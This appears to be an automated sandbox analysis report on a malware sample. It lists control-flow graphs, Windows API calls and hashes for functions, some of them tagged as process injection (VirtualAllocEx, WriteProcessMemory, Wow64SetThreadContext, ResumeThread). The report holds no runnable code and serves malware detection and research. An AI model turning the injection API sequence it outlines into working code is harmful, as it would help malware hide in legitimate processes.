                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 58 722be20-722beb5 60 722beb7-722bec1 58->60 61 722beee-722bf0e 58->61 60->61 62 722bec3-722bec5 60->62 66 722bf10-722bf1a 61->66 67 722bf47-722bf76 61->67 64 722bec7-722bed1 62->64 65 722bee8-722beeb 62->65 68 722bed3 64->68 69 722bed5-722bee4 64->69 65->61 66->67 70 722bf1c-722bf1e 66->70 77 722bf78-722bf82 67->77 78 722bfaf-722c069 CreateProcessA 67->78 68->69 69->69 71 722bee6 69->71 72 722bf20-722bf2a 70->72 73 722bf41-722bf44 70->73 71->65 75 722bf2e-722bf3d 72->75 76 722bf2c 72->76 73->67 75->75 79 722bf3f 75->79 76->75 77->78 80 722bf84-722bf86 77->80 89 722c072-722c0f8 78->89 90 722c06b-722c071 78->90 79->73 82 722bf88-722bf92 80->82 83 722bfa9-722bfac 80->83 84 722bf96-722bfa5 82->84 85 722bf94 82->85 83->78 84->84 86 722bfa7 84->86 85->84 86->83 100 722c0fa-722c0fe 89->100 101 722c108-722c10c 89->101 90->89 100->101 102 722c100 100->102 103 722c10e-722c112 101->103 104 722c11c-722c120 101->104 102->101 103->104 107 722c114 103->107 105 722c122-722c126 104->105 106 722c130-722c134 104->106 105->106 108 722c128 105->108 109 722c146-722c14d 106->109 110 722c136-722c13c 106->110 107->104 108->106 111 722c164 109->111 112 722c14f-722c15e 109->112 110->109 114 722c165 111->114 112->111 114->114
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0722C056
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: f42d72d89072fd8288cc619dbea6f98ff873bba909e0400d51e7b8e54f83600f
                                                              • Instruction ID: 45f79469d54ec89675d5ec1064edef4d5bd0d1202f0643abfbc623160c9de58d
                                                              • Opcode Fuzzy Hash: f42d72d89072fd8288cc619dbea6f98ff873bba909e0400d51e7b8e54f83600f
                                                              • Instruction Fuzzy Hash: 49914BB1D1036ADFEB24CF68C8417EDBBB6BF48310F148169E818A7240DB759986DF91
                                                              Function 02DBAD88 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 115 2dbad88-2dbad97 116 2dbad99-2dbada6 call 2dba0e0 115->116 117 2dbadc3-2dbadc7 115->117 124 2dbada8 116->124 125 2dbadbc 116->125 119 2dbaddb-2dbae1c 117->119 120 2dbadc9-2dbadd3 117->120 126 2dbae29-2dbae37 119->126 127 2dbae1e-2dbae26 119->127 120->119 170 2dbadae call 2dbb010 124->170 171 2dbadae call 2dbb020 124->171 125->117 128 2dbae5b-2dbae5d 126->128 129 2dbae39-2dbae3e 126->129 127->126 134 2dbae60-2dbae67 128->134 131 2dbae49 129->131 132 2dbae40-2dbae47 call 2dba0ec 129->132 130 2dbadb4-2dbadb6 130->125 133 2dbaef8-2dbafb8 130->133 136 2dbae4b-2dbae59 131->136 132->136 165 2dbafba-2dbafbd 133->165 166 2dbafc0-2dbafeb GetModuleHandleW 133->166 137 2dbae69-2dbae71 134->137 138 2dbae74-2dbae7b 134->138 136->134 137->138 139 2dbae88-2dbae91 call 2dba0fc 138->139 140 2dbae7d-2dbae85 138->140 146 2dbae9e-2dbaea3 139->146 147 2dbae93-2dbae9b 139->147 140->139 148 2dbaec1-2dbaece 146->148 149 2dbaea5-2dbaeac 146->149 147->146 155 2dbaef1-2dbaef7 148->155 156 2dbaed0-2dbaeee 148->156 149->148 151 2dbaeae-2dbaebe call 2dba10c call 2dba11c 149->151 151->148 156->155 165->166 167 2dbafed-2dbaff3 166->167 168 2dbaff4-2dbb008 166->168 167->168 170->130 171->130
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02DBAFDE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 5a4ed1b6bd2ce748f9993632599bd01cdf58f387023f730b8290b93038c9516c
                                                              • Instruction ID: d3c929b49135c7944101611a800834bcb6c03f06afa608d87540fb35a76b97e0
                                                              • Opcode Fuzzy Hash: 5a4ed1b6bd2ce748f9993632599bd01cdf58f387023f730b8290b93038c9516c
                                                              • Instruction Fuzzy Hash: CF711170A00B05CFDB25CF6AD06479ABBF2FF48204F10892ED49A97B50EB75E845CB91
                                                              Function 02DB590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 172 2db590c-2db59d9 CreateActCtxA 174 2db59db-2db59e1 172->174 175 2db59e2-2db5a3c 172->175 174->175 182 2db5a4b-2db5a4f 175->182 183 2db5a3e-2db5a41 175->183 184 2db5a51-2db5a5d 182->184 185 2db5a60-2db5a90 182->185 183->182 184->185 189 2db5a42-2db5a4a 185->189 190 2db5a92-2db5b14 185->190 189->182 193 2db59cf-2db59d9 189->193 193->174 193->175
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 02DB59C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: a8dd92e0e9df06cb52dac47c74560be80524bf07d6d023be440a022c152db3e7
                                                              • Instruction ID: 31edfd30831507746d396364a99da0db1f9acb73771396c258bcb7aee0a3ac76
                                                              • Opcode Fuzzy Hash: a8dd92e0e9df06cb52dac47c74560be80524bf07d6d023be440a022c152db3e7
                                                              • Instruction Fuzzy Hash: 9141F5B0C04719CFEB25CFA9C8847DDBBB1BF49704F60846AD409AB251DB75694ACF50
                                                              Function 02DB44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 194 2db44b4-2db59d9 CreateActCtxA 197 2db59db-2db59e1 194->197 198 2db59e2-2db5a3c 194->198 197->198 205 2db5a4b-2db5a4f 198->205 206 2db5a3e-2db5a41 198->206 207 2db5a51-2db5a5d 205->207 208 2db5a60-2db5a90 205->208 206->205 207->208 212 2db5a42-2db5a4a 208->212 213 2db5a92-2db5b14 208->213 212->205 216 2db59cf-2db59d9 212->216 216->197 216->198
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 02DB59C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: d402dbaa3ea5247ee685260353b228e6f7f5607eab8fbc13dd549f178d909b34
                                                              • Instruction ID: 8ad4c8f1170ee218730eb6c19f9b7116aad68f3b8e5edd836bbf36f4ebd9ab38
                                                              • Opcode Fuzzy Hash: d402dbaa3ea5247ee685260353b228e6f7f5607eab8fbc13dd549f178d909b34
                                                              • Instruction Fuzzy Hash: 4341D1B0C0471CCBEB25CFA9C884BDEBBB5BF49704F60806AD409AB251DB756949CF90
                                                              Function 0722BB90 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 217 722bb90-722bbe6 220 722bbf6-722bc35 WriteProcessMemory 217->220 221 722bbe8-722bbf4 217->221 223 722bc37-722bc3d 220->223 224 722bc3e-722bc6e 220->224 221->220 223->224
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0722BC28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 93c05d95a7943ba9a7901e8c5750a08f63a72f700ecee2fe5b837922b8b8c5bc
                                                              • Instruction ID: b5fe18d59f4ba108fb8fde88005e0d8dde8cdbd8c192dd6de47bffe1ab8dd2b3
                                                              • Opcode Fuzzy Hash: 93c05d95a7943ba9a7901e8c5750a08f63a72f700ecee2fe5b837922b8b8c5bc
                                                              • Instruction Fuzzy Hash: 1D2148B19003199FDB10CFA9C885BEEBBF5FF48310F14842AE958A7250D7789941CBA4
                                                              Function 0722B9F9 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 228 722b9f9-722ba4b 232 722ba5b-722ba8b Wow64SetThreadContext 228->232 233 722ba4d-722ba59 228->233 235 722ba94-722bac4 232->235 236 722ba8d-722ba93 232->236 233->232 236->235
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722BA7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: a1c989bdde100bfc3a474615cf2894064c95835e330b12e33436ddeb67105211
                                                              • Instruction ID: 10b23273c22374df4e07fb3bb261cea16348d0e4f897f8a2edd1619bf0074973
                                                              • Opcode Fuzzy Hash: a1c989bdde100bfc3a474615cf2894064c95835e330b12e33436ddeb67105211
                                                              • Instruction Fuzzy Hash: DE216AB1D003199FDB10CFAAC4857EEBBF4EF48220F14842AD459A7241DB789945CFA1
                                                              Function 0722BB98 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 240 722bb98-722bbe6 242 722bbf6-722bc35 WriteProcessMemory 240->242 243 722bbe8-722bbf4 240->243 245 722bc37-722bc3d 242->245 246 722bc3e-722bc6e 242->246 243->242 245->246
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0722BC28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 6d2d0c8eccde2a7c4546b9cf9def2034d9ffebf4beda66b961eefe902863c9be
                                                              • Instruction ID: e327c33446787d7f617e8bf4317f5a45b89cd495be46ba4d0283ffe1802ed55e
                                                              • Opcode Fuzzy Hash: 6d2d0c8eccde2a7c4546b9cf9def2034d9ffebf4beda66b961eefe902863c9be
                                                              • Instruction Fuzzy Hash: 752169B19003199FDF10CFAAC885BEEBBF5FF48310F108429E958A7240D7789941CBA4
                                                              Function 0722BC80 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 250 722bc80-722bd15 ReadProcessMemory 254 722bd17-722bd1d 250->254 255 722bd1e-722bd4e 250->255 254->255
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0722BD08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: dc693d36d48acf8071d12255e61b70bff0b6245bea8d0e5cf5649e426b22b25b
                                                              • Instruction ID: c6c0defacd5783e13571a94517772687794b778386fbb6d6c6436fa0519955a7
                                                              • Opcode Fuzzy Hash: dc693d36d48acf8071d12255e61b70bff0b6245bea8d0e5cf5649e426b22b25b
                                                              • Instruction Fuzzy Hash: 802136B28003199FDB10CFAAD881BEEBBF5FF48310F14842AE958A7250D7799541CBA5
                                                              Function 02DBD658 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 265 2dbd658-2dbd6f4 DuplicateHandle 266 2dbd6fd-2dbd71a 265->266 267 2dbd6f6-2dbd6fc 265->267 267->266
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DBD626,?,?,?,?,?), ref: 02DBD6E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: f839935a477fc033ae34afd6057f60a64c7b5c6c07aaa398520a24e9b1056720
                                                              • Instruction ID: 758c961c228d036a2ab6cda1fe9e1be9b594c19606be286e9485a9d077700e95
                                                              • Opcode Fuzzy Hash: f839935a477fc033ae34afd6057f60a64c7b5c6c07aaa398520a24e9b1056720
                                                              • Instruction Fuzzy Hash: E421F2B5D00248DFDB10CFAAD584BEEBBF5EF08210F14802AE959A3350C378A945CFA0
                                                              Function 02DBB770 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 259 2dbb770-2dbd6f4 DuplicateHandle 261 2dbd6fd-2dbd71a 259->261 262 2dbd6f6-2dbd6fc 259->262 262->261
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DBD626,?,?,?,?,?), ref: 02DBD6E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: bdd970855782a47fe3a67570d9bb7dff19ab1a7cb572f12706199449fa27a504
                                                              • Instruction ID: 1a633feffdb1f30168e2ab3ae95e4936ee67d653b6a39abb81d3491ccf6d3ee4
                                                              • Opcode Fuzzy Hash: bdd970855782a47fe3a67570d9bb7dff19ab1a7cb572f12706199449fa27a504
                                                              • Instruction Fuzzy Hash: 7821F2B590024CDFDB10CFAAD484AEEBBF5EF48310F14802AE958A3350C374A940CFA5
                                                              Function 0722BC88 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 280 722bc88-722bd15 ReadProcessMemory 283 722bd17-722bd1d 280->283 284 722bd1e-722bd4e 280->284 283->284
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0722BD08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 2a2e2a5dc02aa7e65899ba47b2e425e4fed33cf70acd5568f7b5a6433d90dc5e
                                                              • Instruction ID: 25b1faa16692375c2043b70b626eedd2eef7732095f6eefefe654e96f72265c6
                                                              • Opcode Fuzzy Hash: 2a2e2a5dc02aa7e65899ba47b2e425e4fed33cf70acd5568f7b5a6433d90dc5e
                                                              • Instruction Fuzzy Hash: 6E2125B18003599FDB10CFAAC881BEEBBF5FF48310F54842AE958A7250D7799941CBA4
                                                              Function 0722BA00 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 270 722ba00-722ba4b 272 722ba5b-722ba8b Wow64SetThreadContext 270->272 273 722ba4d-722ba59 270->273 275 722ba94-722bac4 272->275 276 722ba8d-722ba93 272->276 273->272 276->275
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722BA7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 8f09c3727062f9247123b677b2bab17113b2c0556bde535235eca745db7e7008
                                                              • Instruction ID: 508459f2922670fe6f2a685e31551f834a620b53c096aa7077eb74a7a2d6e959
                                                              • Opcode Fuzzy Hash: 8f09c3727062f9247123b677b2bab17113b2c0556bde535235eca745db7e7008
                                                              • Instruction Fuzzy Hash: 4E2158B1D003099FDB10CFAAC4857EEBBF4EF48314F54842AD459A7240DB789945CFA4
                                                              Function 0722BAD1 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 288 722bad1-722bb53 VirtualAllocEx 292 722bb55-722bb5b 288->292 293 722bb5c-722bb81 288->293 292->293
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722BB46
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: c81902b25fc0973e2647dcbdc2386d7efd5e718c0328ce5522f1c58bbf6952dd
                                                              • Instruction ID: a9b56c367293502e4554a579ecf315162fdddc30bd33382b200a67eeacb52744
                                                              • Opcode Fuzzy Hash: c81902b25fc0973e2647dcbdc2386d7efd5e718c0328ce5522f1c58bbf6952dd
                                                              • Instruction Fuzzy Hash: 3E1167B28003499FDB10CFAAC844BEEBFF5EF48320F14842AE959A7250C775A540CBA4
                                                              Function 0722B510 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 297 722b510-722b587 ResumeThread 301 722b590-722b5b5 297->301 302 722b589-722b58f 297->302 302->301
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: b6af3b5fe5aa7dd88d6f0f3ba1f3bb75898de2e3d4009f72aa84f5149aa76257
                                                              • Instruction ID: 7dc33c40852a2f40bc60d20238cb15514b8f33468e8be2e48637001c05d94216
                                                              • Opcode Fuzzy Hash: b6af3b5fe5aa7dd88d6f0f3ba1f3bb75898de2e3d4009f72aa84f5149aa76257
                                                              • Instruction Fuzzy Hash: CB1146B1D007499FDB20DFAAC4457EEFBF4EF48320F24842AD459A7240DAB5A941CBA5
                                                              Function 0722BAD8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722BB46
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: ff204835f4b9532e43559231477422489a8fc72fbc9f87554f2d179530a8d556
                                                              • Instruction ID: 0506f338e7e94c4bf15f50da827a25bc8eef034b5666114cb30cee29b117a626
                                                              • Opcode Fuzzy Hash: ff204835f4b9532e43559231477422489a8fc72fbc9f87554f2d179530a8d556
                                                              • Instruction Fuzzy Hash: 1F1137B18003499FDF10DFAAC845BEEBBF5EF48310F148429E959A7250C775A541CFA5
                                                              Function 0722B518 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 3f74b1c8188df8ba42b4cc00bffedf73298f8cf7797a07cb7d39577937a1f133
                                                              • Instruction ID: ad4003dc9c211d9bacc0680c6ef4b60f5f9f625d6dc5cb686817a0216b204431
                                                              • Opcode Fuzzy Hash: 3f74b1c8188df8ba42b4cc00bffedf73298f8cf7797a07cb7d39577937a1f133
                                                              • Instruction Fuzzy Hash: 721158B1D003098FDB20DFAAC4457EEFBF4EF48310F248429D459A7240C775A941CB94
                                                              Function 072287B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0722E245
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: a48cb42250f8d0daf89867a18c2e10d81ebdb9f26664339d6d8079197aeb3b96
                                                              • Instruction ID: a9431bdbf0719098ec4abda94f6aeda0bbba22259e810b230435a99c97f21578
                                                              • Opcode Fuzzy Hash: a48cb42250f8d0daf89867a18c2e10d81ebdb9f26664339d6d8079197aeb3b96
                                                              • Instruction Fuzzy Hash: EE1136B5800349DFDB10CF9AC448BDEBBF8EB48310F10841AE555A7200C3B5A944CFA1
                                                              Function 02DBAF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02DBAFDE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 9aabbb64f962559ed89f3207a0d5a8d225b075ada4a722ba141b565c3d1e2704
                                                              • Instruction ID: bcd98169a73f0b2fec463c18296effe78896e6ffba8d3c63b42da6be56a2817c
                                                              • Opcode Fuzzy Hash: 9aabbb64f962559ed89f3207a0d5a8d225b075ada4a722ba141b565c3d1e2704
                                                              • Instruction Fuzzy Hash: 3611CDB6C006498FDB10CF9AC444BDEFBF4AF88214F10846AE869A7650D379A945CFA1
                                                              Function 07310798 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?), ref: 073107F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391182832.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7310000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: e620644687c9105e8a4197818d193d74011e70c7f753db3f15c924beafcf7cd8
                                                              • Instruction ID: e95fde6809308f9283f56155b343fd6a6c2791188ec0266d294eb4b95969a599
                                                              • Opcode Fuzzy Hash: e620644687c9105e8a4197818d193d74011e70c7f753db3f15c924beafcf7cd8
                                                              • Instruction Fuzzy Hash: 2E116AB58007499FDB10DF99C444BEEBBF4EF48320F10842AD468A7740C778A585CFA1
                                                              Function 073107A0 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?), ref: 073107F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391182832.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7310000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 3874d14e0f114f31c11956cec39a5baf73fc5f7c75189efaedb16fc4e8f4256a
                                                              • Instruction ID: 98569e1d2b5b4cb0f1847f60a93273ff1bb31b94b1df2c15c0b6157f9b309a10
                                                              • Opcode Fuzzy Hash: 3874d14e0f114f31c11956cec39a5baf73fc5f7c75189efaedb16fc4e8f4256a
                                                              • Instruction Fuzzy Hash: 491133B58007498FDB14DF9AC544BEEBBF4EF48320F20842AD968A7240C378A584CFA5
                                                              Function 0140D4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383208051.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 878f43df019f907a2c33703b3b25ac20038ed472f4f026ec0f18d155d3ec716d
                                                              • Instruction ID: 7e78501b8edcff5ed25c6b04977dc7ff9b8bebc8d8c5c6efdf8bedf3b3a69b20
                                                              • Opcode Fuzzy Hash: 878f43df019f907a2c33703b3b25ac20038ed472f4f026ec0f18d155d3ec716d
                                                              • Instruction Fuzzy Hash: 9821D371904240DFDB16DF95D9C0B27BF65FB88318F24C57AED090B2A6C336D45ACAA2
                                                              Function 0140D3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383208051.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 019bcb3c2ba593fd8de272a44163d17b1e11e794932e64cb76ec31b460b18910
                                                              • Instruction ID: 4cab5470d6792d647cf698f613a1f50502e4bf69d6f4d5ae32a71357a4916d3a
                                                              • Opcode Fuzzy Hash: 019bcb3c2ba593fd8de272a44163d17b1e11e794932e64cb76ec31b460b18910
